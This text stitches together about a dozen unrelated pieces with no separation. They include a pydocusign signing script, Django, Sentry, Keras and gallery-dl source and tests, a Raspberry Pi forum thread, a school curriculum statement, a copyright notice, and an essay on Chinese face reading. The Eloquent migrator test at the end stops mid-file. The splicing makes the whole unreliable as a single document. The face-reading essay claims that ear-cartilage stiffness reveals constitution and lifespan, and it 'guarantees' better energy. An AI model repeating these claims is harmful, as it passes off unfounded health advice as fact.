    pydocusign.Signer(
        email='jean.francais@example.com',
        name=u'Jean Français',
        recipientId=1,
        clientUserId=str(uuid.uuid4()),  # Something unique in your database.
        tabs=[
            pydocusign.SignHereTab(
                documentId=1,
                pageNumber=1,
                xPosition=100,
                yPosition=100,
            ),
        ],
        emailSubject='Voici un sujet',
        emailBody='Voici un message',
        supportedLanguage='fr',
    ),
    pydocusign.Signer(
        email='paul.english@example.com',
        name=u'Paul English',
        recipientId=2,
        clientUserId=str(uuid.uuid4()),  # Something unique in your database.
        tabs=[],  # No tabs means user places tabs himself in DocuSign UI.
        emailSubject='Here is a subject',
        emailBody='Here is a message',
        supportedLanguage='en',
    ),
]


# Create envelope with embedded signing.
print("2. POST {account}/envelopes")
event_notification = pydocusign.EventNotification(
    url=callback_url,
)
document_path = os.path.join(fixtures_dir(), 'test.pdf')
document_2_path = os.path.join(fixtures_dir(), 'test2.pdf')
# Documents are streamed from open file handles, so keep both files open
# for the duration of the envelope-creation request.
with open(document_path, 'rb') as pdf, open(document_2_path, 'rb') as pdf_2:
    envelope = pydocusign.Envelope(
        documents=[
            pydocusign.Document(
                name='document.pdf',
                documentId=1,
                data=pdf,
            ),
            pydocusign.Document(
                name='document_2.pdf',
                documentId=2,
                data=pdf_2,
            ),
        ],
        emailSubject='This is the subject',
        emailBlurb='This is the body',
        eventNotification=event_notification,
        status=pydocusign.Envelope.STATUS_SENT,
        recipients=signers,
    )
    client.create_envelope_from_documents(envelope)
print("   Received envelopeId {id}".format(id=envelope.envelopeId))


# Update recipient list of envelope: fetch envelope's ``UserId`` from DocuSign.
print("3. GET {account}/envelopes/{envelopeId}/recipients")
envelope.get_recipients()
print("   Received UserId for recipient 0: {0}".format(
    envelope.recipients[0].userId))
print("   Received UserId for recipient 1: {0}".format(
    envelope.recipients[1].userId))


# Retrieve embedded signing for first recipient.
print("4. Get DocuSign Recipient View")
signing_url = envelope.post_recipient_view(
    envelope.recipients[0],
    returnUrl=signer_return_url)
print("   Received signing URL for recipient 0: {0}".format(signing_url))
signing_url = envelope.post_recipient_view(
    envelope.recipients[1],
    returnUrl=signer_return_url)
print("   Received signing URL for recipient 1: {0}".format(signing_url))


# Download signature documents.
print("5. List signature documents.")
document_list = envelope.get_document_list()
print("   Received document list: {0}".format(document_list))
print("6. Download documents from DocuSign.")
for signed_document in document_list:
    document = envelope.get_document(signed_document['documentId'])
    # SHA1 digest is printed only to demonstrate the download succeeded.
    document_sha = hashlib.sha1(document.read()).hexdigest()
    print("   Document SHA1: {0}".format(document_sha))
print("7. Download signature certificate from DocuSign.")
document = envelope.get_certificate()
document_sha = hashlib.sha1(document.read()).hexdigest()
print("   Certificate SHA1: {0}".format(document_sha))
The foundational principle of Chinese Medicine is the concept of “Jing”, which is often described as our constitutional makeup. Jing includes all physical inheritance along with the talents and abilities and potential that has been passed down from ancestors. It can also be described as the unique and personal mixture of strengths or predispositions for deficiencies in physical, emotional and mental abilities combined with an equally unusual assortment of personality traits. Each person is born with an intrinsic amount of Jing, or inherited constitution. Jing is like the battery that each person is given to live from for the rest of his or her life. People’s batteries may be different sizes, but they all start out fully charged. Likewise, some people are born with very strong constitutions and others start out with more delicacy. However, what is most important is how well you guard this vital energy no matter how much energy you start out with. Therefore, protecting and safeguarding Jing is one of the most important teachings of Chinese Medicine. Overuse of Jing leads to injuries and illnesses and preserving Jing, which enhances health and encourages longevity. So the first thing to find out is how much intrinsic Jing you have and then look for clues about how you are managing it and Chinese Face Reading has just the clues to help you find out. The best way to measure Jing is from the cartilage of the upper ear. If you grasp it firmly between your fingers and then pull it a bit back and forth, you can get an idea of how stiff and strong it is. Ideally, the ear cartilage should be fairly stiff, but with a slight ability to bend. This means that there is a good amount of inherent Jing. Softer, thinner and more flexible ears have less strength, but are still considered healthy. The difference is that people with very strong Jing get sick less often, if they get sick at all and have the ability to live longer than people with ears that are flimsier. 
However, this is only if they take care of their Jing. Medium ears still give a fairly strong constitution, but the person who possesses these ears gets sick easier and more often. This is not to say that they will die younger, for if they manage their Jing well, they may in fact live longer than someone who has very strong ears. This is because Jing Management is the most important aspect of longevity. Many times, people who have strong constitutions don’t pay attention to the warning signs and allow minor problems to become big problems. People who have been sick more often in their lives usually know not only how to take care of themselves when they become sick, they often know how to defuse an illness by taking good care of themselves when they feel the initial symptoms. This is preventative medicine and a crucial aspect of good health. So, it is actually much less important how much Jing you started out with than how well you take care of it. However, everyone has to use Jing over a lifetime. The key is to not overuse it too fast or illnesses or injuries occur at too young of an age. I call this “Jing Blowout.” Jing is supposed to be used gradually and whenever it is overused, it is necessary to make Qi to buffer the use of Jing. And, ancient Chinese Medicine has only two ways to make Jing and other ways to preserve it. The first way to make Qi to preserve Jing is by eating food. Good food transforms into energy, but not just any food will do. The ancient Chinese believed that a line on the bridge of the nose between the eyes indicated the need to eat appropriately for your body’s needs. I was taught by my Chinese Grandmother that food had to excite the palate and energetically expand with a kind of joy when you eat it because it tastes so good and feels so satisfying. It could really be any kind of food, but your body had to want it at that time and you had to provide it. 
She believed that you didn’t need to eat a lot of it and that it didn’t make you gain weight because it was so right for you. It is also very different from the kind of craving that you have based on emotional needs, where you can’t eat enough and then feel somewhat sick afterwards. Instead this kind of eating is satiating and enjoyable. It also makes more energy to live on so that you don’t have to use up more Jing. The second way to make Qi is by breathing. A marking across the philtrum between the nose and the mouth is a sign that this kind of Qi needs to be made. This is not just regular breathing, breath only transforms when you get to the place called the “time between breaths” where you don’t need to breathe in so deeply for a short while and inspires creativity and spirituality. Only then does breath transform into Qi. Now there are many ways of breathing deeply and all are good, but I was taught a very simple method that involved breathing out longer than you breathed in to detoxify the body and fully oxygenate the blood. Singing was a very natural example of this better kind of breathing. And, when you breathe this way for only a little while, it gets you back into the present numinous moment where anything is possible and the upwelling of creativity emerges. This is such a necessary place to live for all creative people. Finally, in order to preserve the most Jing and Qi, it is necessary to live a more regular life with adequate rest and sleep. This is much more important than most people realize and the entire beginning of the Yellow Emperor’s Classic of Chinese Medicine is devoted to this topic. The kidneys, which are associated with Jing, need to be laying down to rest and the brain and the emotions need to be quiet. If enough rest and sleep is not achieved, then it is important to meditate and take breaks from activity. Although these ancient tips for health and longevity are easy to understand, they are much harder to put into practice.
If you try to live this way, I guarantee that you will feel more energetic and hopefully live longer too.
""" Tests for the update() queryset method that allows in-place, multi-object updates. """ from django.db import models class DataPoint(models.Model): name = models.CharField(max_length=20) value = models.CharField(max_length=20) another_value = models.CharField(max_length=20, blank=True) def __str__(self): return self.name class RelatedPoint(models.Model): name = models.CharField(max_length=20) data = models.ForeignKey(DataPoint, models.CASCADE) def __str__(self): return self.name class A(models.Model): x = models.IntegerField(default=10) class B(models.Model): a = models.ForeignKey(A, models.CASCADE) y = models.IntegerField(default=10) class C(models.Model): y = models.IntegerField(default=10) class D(C): a = models.ForeignKey(A, models.CASCADE) class Foo(models.Model): target = models.CharField(max_length=10, unique=True) class Bar(models.Model): foo = models.ForeignKey(Foo, models.CASCADE, to_field='target') m2m_foo = models.ManyToManyField(Foo, related_name='m2m_foo')
The following describes the Copyright Notice for our Master Domaining website. The entire contents of our Master Domaining website are protected by intellectual property law, including international copyright and trademark laws. The owner of the copyrights and/or trademarks are our website, and/or other third party licensors or related entities. You are granted a nonexclusive, nontransferable, revocable license to use our Master Domaining website only for private, personal, noncommercial reasons. You may print and download portions of material from the different areas of the website solely for your own non-commercial use, provided that you agree not to change the content from its original form. Moreover, you agree not to modify or delete any copyright or proprietary notices from the materials you print or download from Master Domaining. Also note that any notice on any portion of our website that forbids printing & downloading trumps all prior statements and controls. As a user at Master Domaining, you agree to use the products and services offered by our website in a manner consistent with all applicable local, state and federal laws and regulations. No material shall be stored or transmitted which infringes or violates the rights of others, which is unlawful, obscene, profane, indecent or otherwise objectionable, threatening, defamatory, or invasive of privacy or publicity rights. Our website prohibits conduct that might constitute a criminal offense, give rise to civil liability or otherwise violate any law. Any activity that restricts or inhibits any other Master Domaining user from using the services of our website is also prohibited. Unless allowed by a written agreement, you may not post or transmit advertising or commercial solicitation on our website.
# -*- coding: utf-8 -*-
from __future__ import absolute_import

import six

from sentry.api.serializers import serialize
from sentry.incidents.logic import create_alert_rule
from sentry.incidents.models import AlertRuleThresholdType
from sentry.snuba.models import QueryAggregations
from sentry.testutils import TestCase


class AlertRuleSerializerTest(TestCase):
    def test_simple(self):
        # Create a minimal alert rule, serialize it, and verify that every
        # serialized field mirrors the corresponding model attribute.
        rule = create_alert_rule(
            self.organization,
            [self.project],
            "hello",
            AlertRuleThresholdType.ABOVE,
            "level:error",
            QueryAggregations.TOTAL,
            10,
            1000,
            400,
            1,
        )
        serialized = serialize(rule)

        # Fields requiring a conversion before comparison.
        assert serialized["id"] == six.text_type(rule.id)
        assert serialized["projectId"] == six.text_type(
            rule.query_subscriptions.first().project_id
        )

        # Fields expected to round-trip unchanged, as (key, expected) pairs.
        expected = (
            ("name", rule.name),
            ("thresholdType", rule.threshold_type),
            ("dataset", rule.dataset),
            ("query", rule.query),
            ("aggregation", rule.aggregation),
            ("timeWindow", rule.time_window),
            ("resolution", rule.resolution),
            ("alertThreshold", rule.alert_threshold),
            ("resolveThreshold", rule.resolve_threshold),
            ("thresholdPeriod", rule.threshold_period),
            ("dateModified", rule.date_modified),
            ("dateAdded", rule.date_added),
        )
        for key, value in expected:
            assert serialized[key] == value
Back Powering the Pi via the GPIO Header? Looking at designing a HAT which will supply 5V power to the RPi. As a result I'm looking at the notes on back powering and specifically the link to the back powering diagram. That diagram just shows that I need a protection diode in the HAT design, but isn't too specific about the type of diode or any specification for that diode. I'm not an expert but I've seen where people use MOSFETs instead of diodes because of the much reduced voltage drop in the protection circuit. Could that design be used or should a diode (Schottky?) be used? Re: Back Powering the Pi via the GPIO Header? If you want a diode use a Schottky as they have low voltage drop. You should also add a polyfuse if you power through the GPIO Header. I recently stopped powering via the GPIO header as I had been for several months, and instead started using PP1 and the underside of pin 6. Using this configuration allows me to bypass the micro USB port, but still have the polyfuse.
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=protected-access
"""Contains the `Node` class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import collections
import copy
import json

import numpy as np

from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.keras import backend
from tensorflow.python.keras.engine import base_layer_utils
from tensorflow.python.keras.engine import keras_tensor
from tensorflow.python.keras.saving.saved_model import json_utils
from tensorflow.python.keras.utils import tf_utils
from tensorflow.python.util import nest

# Sentinel tag used in the serialized config for constant (non-KerasTensor)
# values passed as a layer's first call argument.
_CONSTANT_VALUE = '_CONSTANT_VALUE'


class Node(object):
  """A `Node` describes the connectivity between two layers.

  Each time a layer is connected to some new input,
  a node is added to `layer._inbound_nodes`.
  Each time the output of a layer is used by another layer,
  a node is added to `layer._outbound_nodes`.

  Arguments:
    layer: The Layer for the Layer.__call__ this node represents.
    call_args: The positional arguments the Layer was called with.
    call_kwargs: The keyword arguments the Layer was called with.
    outputs: The outputs of the Layer.__call__
  """

  def __init__(self, layer, call_args=None, call_kwargs=None, outputs=None):
    """Records one Layer.__call__ and wires this node into the layer graph."""
    call_args = [] if call_args is None else call_args
    call_kwargs = {} if call_kwargs is None else call_kwargs
    outputs = [] if outputs is None else outputs

    self.layer = layer
    # An input node is a call with no arguments at all (e.g. from InputLayer).
    self.is_input = not call_args and not call_kwargs

    # These arguments are user-provided. Copy the structures here so that
    # future user modifications do not affect the node's metadata.
    # We copy using map_structure rather than python's shallow or deep copy,
    # because the args can be data structures (so shallow copy is
    # insufficient), but individual values might not support copy.copy
    # or be too expensive to deep copy.
    call_args = nest.map_structure(lambda t: t, call_args)
    call_kwargs = nest.map_structure(lambda t: t, call_kwargs)
    self.outputs = nest.map_structure(lambda t: t, outputs)
    self.call_args = call_args
    self.call_kwargs = call_kwargs

    # Cached for performance.
    self._flat_arguments = nest.flatten((self.call_args, self.call_kwargs))
    # Used to avoid expensive `nest` operations in the most common case.
    self._single_positional_tensor_passed = (not self.call_kwargs and len(
        self.call_args) == 1 and tensor_util.is_tensor(self.call_args[0]))

    if not keras_tensor.keras_tensors_enabled():
      # Create TensorFlowOpLayers if needed.
      for obj in self._flat_arguments:
        if (isinstance(obj, ops.Tensor) and
            base_layer_utils.needs_keras_history(
                obj, ignore_call_context=True)):
          base_layer_utils.create_keras_history(obj)

    # Collect arguments that are Keras tensors, remembering their flat index
    # so map_arguments() can substitute computed values back in place.
    self._keras_inputs = []
    self._keras_inputs_ids_and_indices = []
    for i, ele in enumerate(self._flat_arguments):
      if is_keras_tensor(ele):
        self._keras_inputs.append(ele)
        kt_id = str(id(ele))
        kt_index = i
        self._keras_inputs_ids_and_indices.append((kt_id, kt_index))

    # Wire up Node to Layers.
    self.layer._inbound_nodes.append(self)
    for kt in self.keras_inputs:
      inbound_layer = kt._keras_history.layer
      if inbound_layer is not None:  # `None` for `Input` tensors.
        inbound_layer._outbound_nodes.append(self)

    # Set metadata on outputs.
    node_index = len(self.layer._inbound_nodes) - 1
    for i, tensor in enumerate(nest.flatten(outputs)):
      tensor._keras_history = KerasHistory(
          layer=layer, node_index=node_index, tensor_index=i)

    # Cached for performance.
    self.flat_input_ids = [str(id(t)) for t in self._keras_inputs]
    self.flat_output_ids = [str(id(t)) for t in nest.flatten(self.outputs)]

  @property
  def keras_inputs(self):
    """Tensors input to this node that can be traced back to a `keras.Input`."""
    return self._keras_inputs

  @property
  def parent_nodes(self):
    """Returns all the `Node`s whose output this node immediately depends on."""
    node_deps = []
    for kt in self.keras_inputs:
      layer = kt._keras_history.layer
      node_index = kt._keras_history.node_index
      if layer is not None:  # `None` for `Input` tensors.
        node_deps.append(layer._inbound_nodes[node_index])
    return node_deps

  def iterate_inbound(self):
    """Yields tuples representing the data inbound from other nodes.

    Yields:
      tuples like: (inbound_layer, node_index, tensor_index, tensor).
    """
    for kt in self.keras_inputs:
      keras_history = kt._keras_history
      layer = keras_history.layer
      node_index = keras_history.node_index
      tensor_index = keras_history.tensor_index
      yield layer, node_index, tensor_index, kt

  def map_arguments(self, tensor_dict):
    """Maps Keras Tensors to computed Tensors using `tensor_dict`."""
    if self._single_positional_tensor_passed:
      # Performance optimization for most common case.
      kt_id, _ = self._keras_inputs_ids_and_indices[0]
      return (tensor_dict[kt_id].pop(),), {}
    else:
      # Substitute each computed tensor into the flat argument list at the
      # index recorded in __init__, then repack into the original structure.
      flat_arguments = copy.copy(self._flat_arguments)
      for kt_id, kt_index in self._keras_inputs_ids_and_indices:
        flat_arguments[kt_index] = tensor_dict[kt_id].pop()

      args, kwargs = nest.pack_sequence_as((self.call_args, self.call_kwargs),
                                           flat_arguments)
      return args, kwargs

  def serialize(self, make_node_key, node_conversion_map):
    """Serializes `Node` for Functional API's `get_config`."""
    # Serialization still special-cases first argument.
    args, kwargs = self.call_args, self.call_kwargs
    inputs, args, kwargs = self.layer._split_out_first_arg(args, kwargs)

    # Treat everything other than first argument as a kwarg.
    arguments = dict(zip(self.layer._call_fn_args[1:], args))
    arguments.update(kwargs)
    kwargs = arguments

    def _serialize_keras_tensor(t):
      """Serializes a single Tensor passed to `call`."""
      if hasattr(t, '_keras_history'):
        kh = t._keras_history
        node_index = kh.node_index
        node_key = make_node_key(kh.layer.name, node_index)
        new_node_index = node_conversion_map.get(node_key, 0)
        return [kh.layer.name, new_node_index, kh.tensor_index]

      if isinstance(t, np.ndarray):
        return t.tolist()

      if isinstance(t, ops.Tensor):
        return backend.get_value(t).tolist()

      return t

    kwargs = nest.map_structure(_serialize_keras_tensor, kwargs)
    try:
      # Fail fast with a clear error if any argument cannot be serialized.
      json.dumps(kwargs, default=json_utils.get_json_type)
    except TypeError:
      kwarg_types = nest.map_structure(type, kwargs)
      raise TypeError('Layer ' + self.layer.name +
                      ' was passed non-JSON-serializable arguments. ' +
                      'Arguments had types: ' +
                      str(kwarg_types) + '. They cannot be serialized out '
                      'when saving the model.')

    # `kwargs` is added to each Tensor in the first arg. This should be
    # changed in a future version of the serialization format.
    def serialize_first_arg_tensor(t):
      if is_keras_tensor(t):
        kh = t._keras_history
        node_index = kh.node_index
        node_key = make_node_key(kh.layer.name, node_index)
        new_node_index = node_conversion_map.get(node_key, 0)
        data = [kh.layer.name, new_node_index, kh.tensor_index, kwargs]
      else:
        # If an element in the first call argument did not originate as a
        # keras tensor and is a constant value, we save it using the format
        # ['_CONSTANT_VALUE', -1, serialized_tensor_or_python_constant]
        # (potentially including serialized kwargs in an optional 4th
        # argument).
        data = [_CONSTANT_VALUE, -1, _serialize_keras_tensor(t), kwargs]
      return tf_utils.ListWrapper(data)

    data = nest.map_structure(serialize_first_arg_tensor, inputs)
    if (not nest.is_nested(data) and
        not self.layer._preserve_input_structure_in_config):
      data = [data]
    data = tf_utils.convert_inner_node_data(data)
    return data

  #############################################################
  # Properties for Backwards compatibility.
  # These only check the first input argument
  # As nodes are internal, they may be removed in the future.
  #############################################################

  @property
  def input_tensors(self):
    if self.is_input:
      return [self.outputs]  # Used in `Layer.input`.
    return self.call_args[0]

  @property
  def output_tensors(self):
    if self.is_input:
      return [self.outputs]  # Used in `Layer.input`.
    return self.outputs

  @property
  def input_shapes(self):
    input_shapes = nest.map_structure(backend.int_shape, self.input_tensors)
    # Unwrap the single-input case (unless this is an input node, whose
    # input_tensors are deliberately wrapped in a list above).
    if len(input_shapes) == 1 and not self.is_input:
      return input_shapes[0]
    return input_shapes

  @property
  def output_shapes(self):
    return nest.map_structure(backend.int_shape, self.output_tensors)

  @property
  def outbound_layer(self):
    return self.layer

  @property
  def inbound_layers(self):
    if self.is_input:
      return []
    inbound_layers = nest.map_structure(lambda t: t._keras_history.layer,
                                        self.call_args[0])
    return inbound_layers


class KerasHistory(
    collections.namedtuple('KerasHistory',
                           ['layer', 'node_index', 'tensor_index'])):
  """Tracks the Layer call that created a Tensor, for Keras Graph Networks.

  During construction of Keras Graph Networks, this metadata is added to
  each Tensor produced as the output of a Layer, starting with an
  `InputLayer`. This allows Keras to track how each Tensor was produced, and
  this information is later retraced by the `keras.engine.Network` class to
  reconstruct the Keras Graph Network.

  Attributes:
    layer: The Layer that produced the Tensor.
    node_index: The specific call to the Layer that produced this Tensor. Layers
      can be called multiple times in order to share weights. A new node is
      created every time a Layer is called.
    tensor_index: The output index for this Tensor. Always zero if the Layer
      that produced this Tensor only has one output. Nested structures of
      Tensors are deterministically assigned an index via `nest.flatten`.
  """
  # Added to maintain memory and performance characteristics of `namedtuple`
  # while subclassing.
  __slots__ = ()


def is_keras_tensor(obj):
  # Duck-typed check: anything tagged with `_keras_history` counts.
  return hasattr(obj, '_keras_history')
As outlined in our Vision and Values Statement, we aim to provide excellent learning opportunities for our pupils, promoting achievement in every area and nurturing social, emotional and spiritual wellbeing. As our children gain confidence, knowledge and skills we hope that they will go on to become compassionate, well balanced young people. They will take their place in society as active citizens, economically independent, exemplifying the British values of equality, tolerance, democracy, individual liberty and rule of law. Our starting point for curriculum design are our four foundations. We aim to help our pupils develop an inner discipline that encourages them to not just ‘follow the crowd’. We want them to make up their own minds using an evidence based approach and be ready to accept responsibility for what they do. They will grow through making choices, taking responsibility and being honest with themselves and others. SMSC is taught in a cross curricular way throughout the year groups (see our curriculum map) and is not limited to specific Personal, Social, Health and citizenship Education (PSHCE) or Religious Education (RE) lessons. Character and resilience are the qualities, the inner resources that we call on to get us through the frustrations and setbacks that are part and parcel of life. We must instil these qualities in our children and make sure that they are ready to make their way in the world as robust and confident individuals. In order to achieve this we have incorporated the five foundations for building character in to our curriculum: sport, creativity, performing, the world of work, volunteering and membership. At our school we see the Year 1 to Year 6 curriculum as a body of subject-specific knowledge defined by us and the National Curriculum and so we take a knowledge led approach. Skills are an outcome of the curriculum, not its purpose. 
When children are ‘fluent’ in knowledge, such as number bonds or 8 times tables – they can then apply them as skills. We have a clear focus on subjects as units to deliver the curriculum. Our Curriculum Map, and ‘Units of Work’ in every subject, contain the knowledge that we have identified as essential in our school. Our ‘Units of Work’ in each subject have been carefully crafted by expert teachers across our Four School Partnership, identifying composite tasks and breaking them down into component tasks to ensure sequential, layered knowledge acquisition. These ‘Units of Work’ also support our particular style of teaching and help with the speedy and effective induction of new staff. This is particularly important in an inner London environment where the cost of accommodation prevents most of our staff from being able to stay with us long term. We use ‘Knowledge Organisers’ in order to help children with knowledge retention and issues around working memory. Our teaching style has a strong focus on the effective retention and use of subject-specific vocabulary using ‘Walk The Word’ techniques. Each term we suspend the usual curriculum for a week in order for everyone to take part in a Whole School Project Week. In the recent past these have included Peace Week, Equalities Week, Christian Social Justice Week, Keeping Safe Week and Careers Week. As we are situated in central London, we use London as our classroom, providing pupils with a very wide range of off-site visits and visitors to enhance their learning. Look at the Curriculum Gallery section of our website for more information about individual subjects in our curriculum. Look at our Curriculum Map below for an overview of subjects, year by year. Look at our Curriculum Overviews for Parents/Carers to see termly information about our curriculum and how parents/carers might support children with their learning at home.
We constantly review our curriculum through regular subject-based monitoring activity across the Five School Partnership to ensure sequential, layered knowledge acquisition and check that pupil outcomes are of a very high quality. We retain banks of high-quality pupil work in order to induct new staff to our schools as effectively as possible, sharing our very high expectations. Children love to show what they know and what they can do. They make very good progress using this approach, as evidenced by our pupil achievement data year on year, the work in their books and their attitude to learning. What is your child learning this term?
# -*- coding: utf-8 -*-

# Copyright 2019-2021 Mike Fährmann
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.

"""Extractors for Shopify instances"""

from .common import BaseExtractor, Message
from .. import text
import re


class ShopifyExtractor(BaseExtractor):
    """Base class for Shopify extractors"""
    basecategory = "shopify"
    filename_fmt = "{product[title]}_{num:>02}_{id}.{extension}"
    archive_fmt = "{id}"

    def __init__(self, match):
        BaseExtractor.__init__(self, match)
        # Path captured by the last group of the matched URL pattern,
        # re-rooted on the canonical site root.
        self.item_url = self.root + match.group(match.lastindex)

    def items(self):
        """Yield one Directory message, then one Url message per image.

        Each product URL is fetched via the Shopify ``<product>.json``
        endpoint; unavailable products (HTTP >= 400) are skipped with a
        warning instead of aborting the whole extraction.
        """
        data = self.metadata()
        yield Message.Directory, data

        headers = {"X-Requested-With": "XMLHttpRequest"}
        for url in self.products():
            response = self.request(
                url + ".json", headers=headers, fatal=False)
            if response.status_code >= 400:
                self.log.warning('Skipping %s ("%s: %s")',
                                 url, response.status_code, response.reason)
                continue
            product = response.json()["product"]
            # Drop the single "featured image" entry; the full list is in
            # "images" below.
            del product["image"]

            for num, image in enumerate(product.pop("images"), 1):
                # Derive filename/extension metadata from the image URL.
                text.nameext_from_url(image["src"], image)
                image.update(data)
                image["product"] = product
                image["num"] = num
                yield Message.Url, image["src"], image

    def metadata(self):
        """Return general metadata"""
        return {}

    def products(self):
        """Return an iterable with all relevant product URLs"""


# Registers the supported Shopify sites and builds the shared URL prefix
# pattern used by the concrete extractor classes below.
BASE_PATTERN = ShopifyExtractor.update({
    "fashionnova": {
        "root": "https://www.fashionnova.com",
        "pattern": r"(?:www\.)?fashionnova\.com",
    },
    "omgmiamiswimwear": {
        "root": "https://www.omgmiamiswimwear.com"
    },
})


class ShopifyCollectionExtractor(ShopifyExtractor):
    """Base class for collection extractors for Shopify based sites"""
    subcategory = "collection"
    directory_fmt = ("{category}", "{collection[title]}")
    pattern = BASE_PATTERN + r"(/collections/[\w-]+)/?(?:$|[?#])"
    test = (
        ("https://www.fashionnova.com/collections/mini-dresses", {
            "range": "1-20",
            "count": 20,
            "archive": False,
        }),
        ("https://www.fashionnova.com/collections/mini-dresses/?page=1"),
        ("https://www.fashionnova.com/collections/mini-dresses#1"),
        ("https://www.omgmiamiswimwear.com/collections/fajas"),
    )

    def metadata(self):
        # The collection's own JSON endpoint provides the directory metadata.
        return self.request(self.item_url + ".json").json()

    def products(self):
        """Yield product URLs by scraping the paginated collection HTML.

        Two regex variants are tried in order, because different Shopify
        themes link products with different markup. State shared across
        iterations:
          - ``fetch``: whether the next loop iteration must re-request the
            page (False means "re-scan the same page with the next pattern").
          - ``last``: last yielded path, used both to skip an adjacent
            duplicate and to detect that at least one product was found.
        """
        params = {"page": 1}
        fetch = True
        last = None

        for pattern in (
                r"/collections/[\w-]+/products/[\w-]+",
                r"href=[\"'](/products/[\w-]+)",
        ):
            search_re = re.compile(pattern)

            while True:
                if fetch:
                    page = self.request(self.item_url, params=params).text
                urls = search_re.findall(page)

                # Fewer than 3 hits is treated as "pattern exhausted":
                # stop entirely if this pattern already produced results,
                # otherwise fall through to the next pattern on the same page.
                if len(urls) < 3:
                    if last:
                        return
                    fetch = False
                    break
                fetch = True

                for path in urls:
                    if last == path:
                        continue
                    last = path
                    yield self.root + path
                params["page"] += 1


class ShopifyProductExtractor(ShopifyExtractor):
    """Base class for product extractors for Shopify based sites"""
    subcategory = "product"
    directory_fmt = ("{category}", "Products")
    pattern = BASE_PATTERN + r"((?:/collections/[\w-]+)?/products/[\w-]+)"
    test = (
        ("https://www.fashionnova.com/products/essential-slide-red", {
            "pattern": r"https?://cdn\d*\.shopify.com/",
            "count": 3,
        }),
        ("https://www.omgmiamiswimwear.com/products/la-medusa-maxi-dress", {
            "pattern": r"https://cdn\.shopify\.com/s/files/1/1819/6171/",
            "count": 5,
        }),
        ("https://www.fashionnova.com/collections/flats/products/name"),
    )

    def products(self):
        # A product page is itself the single product URL.
        return (self.item_url,)
Tags are a very useful method to present CTAs on a specific page or on several pages. You can create as many tags as you need for the different CTAs you are running. Create – Go to Settings > Additional settings, and scroll down to the “Tags for Pages” section. Click on “Add page tag” and add the name of the tag. Click on ‘Apply’ at the bottom of the page to save. Relate To Pages – Go to the Personalization > Scan Results tab and search for the URL you want to tag. Once it comes up, click on the ‘Edit’ button. You will see the tag(s) you created in the drop-down menu. Check the tag’s box and click on save. Use Tags In CTA – Go to Calls to Action and click on “New Call to Action”, then scroll down to the “By tags” section. You will see the tags you have created. Choose the tag you want to include or exclude.
# -*- coding: utf-8 -*-

import os
import glob
from flexmock import flexmock, flexmock_teardown
from .. import EloquentTestCase
from eloquent.migrations import Migrator, DatabaseMigrationRepository, Migration
from eloquent import DatabaseManager
from eloquent.connections import Connection


class MigratorTestCase(EloquentTestCase):
    """Tests for Migrator.run()/rollback() using flexmock expectations.

    Each test builds a Migrator whose repository and '_resolve' lookup are
    mocked, and patches glob.glob so migration discovery sees a fixed set
    of '<n>_<name>.py' files.
    """

    def tearDown(self):
        # Verifies all flexmock expectations and removes the patches.
        flexmock_teardown()

    def test_migrations_are_run_up_when_outstanding_migrations_exist(self):
        # '1_foo' is already ran, so only '2_bar' and '3_baz' should be
        # resolved, run 'up', and logged in batch 1.
        resolver = flexmock(DatabaseManager)
        resolver.should_receive('connection').and_return(None)

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        g = flexmock(glob)
        g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
            os.path.join(os.getcwd(), '2_bar.py'),
            os.path.join(os.getcwd(), '1_foo.py'),
            os.path.join(os.getcwd(), '3_baz.py')
        ])

        migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
        migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)
        migrator.get_repository().should_receive('log').once().with_args('2_bar', 1)
        migrator.get_repository().should_receive('log').once().with_args('3_baz', 1)

        bar_mock = flexmock(MigrationStub())
        bar_mock.should_receive('up').once()
        baz_mock = flexmock(MigrationStub())
        baz_mock.should_receive('up').once()
        migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
        migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)

        migrator.run(os.getcwd())

    def test_up_migration_can_be_pretended(self):
        # With pretend=True the connection's 'pretend' wrapper is invoked;
        # here it simply calls the callback, and the repository must NOT
        # receive 'log' (no expectations are set for it).
        resolver_mock = flexmock(DatabaseManager)
        resolver_mock.should_receive('connection').and_return({})
        resolver = flexmock(DatabaseManager({}))
        connection = flexmock(Connection(None))
        connection.should_receive('pretend').replace_with(lambda callback: callback(None))
        resolver.should_receive('connection').with_args(None).and_return(connection)

        migrator = flexmock(
            Migrator(
                flexmock(
                    DatabaseMigrationRepository(
                        resolver, 'migrations'
                    )
                ),
                resolver
            )
        )

        g = flexmock(glob)
        g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([
            os.path.join(os.getcwd(), '2_bar.py'),
            os.path.join(os.getcwd(), '1_foo.py'),
            os.path.join(os.getcwd(), '3_baz.py')
        ])

        migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo'])
        migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1)

        bar_mock = flexmock(MigrationStub())
        bar_mock.should_receive('get_connection').once().and_return(None)
        bar_mock.should_receive('up').once()
        baz_mock = flexmock(MigrationStub())
        baz_mock.should_receive('get_connection').once().and_return(None)
        baz_mock.should_receive('up').once()
        migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock)
        migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock)

        migrator.run(os.getcwd(), True)

    def test_nothing_is_done_when_no_migrations_outstanding(self):
        # Every discovered migration is already ran, so no repository
        # logging or '_resolve' calls are expected.
